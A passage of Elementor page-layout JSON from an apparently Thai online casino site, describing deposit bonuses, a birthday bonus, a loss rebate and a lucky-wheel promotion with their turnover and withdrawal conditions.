0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"e591d78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"3e9ff8e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-Yok789.webp\",\"id\":282,\"size\":\"\",\"alt\":\"79 get 200\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d853dea\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2ea7fc2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">\\u0e1d\\u0e32\\u0e01 79 \\u2192 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 121 = \\u0e23\\u0e27\\u0e21 200 \\/ \\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 7 \\u0e40\\u0e17\\u0e48\\u0e32 \\/ \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 600<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"996\\\" data-end=\\\"1012\\\">\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>\\u00a07 \\u0e40\\u0e17\\u0e48\\u0e32 \\u0e02\\u0e2d\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e23\\u0e27\\u0e21<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e2b\\u0e49\\u0e32\\u0e21\\u0e0b\\u0e37\\u0e49\\u0e2d\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"883800f\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"b25769f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-Yok789.webp\",\"id\":279,\"size\":\"\",\"alt\":\"Bonus free 100\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"498b0c4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Bonus-Banner-Yok789.webp\",\"id\":275,\"size\":\"\",\"alt\":\"HBD Bonus\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"0d72c4a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Reward-10_-Banner-Yok789.webp\",\"id\":277,\"size\":\"\",\"alt\":\"Reward 10\",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"879b024\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/lucky-wheel-Banner-Yok789.webp\",\"id\":276,\"size\":\"\",\"alt\":\"lucky wheel \",\"source\":\"library\"},\"image_size\":\"full\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"luca333line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" 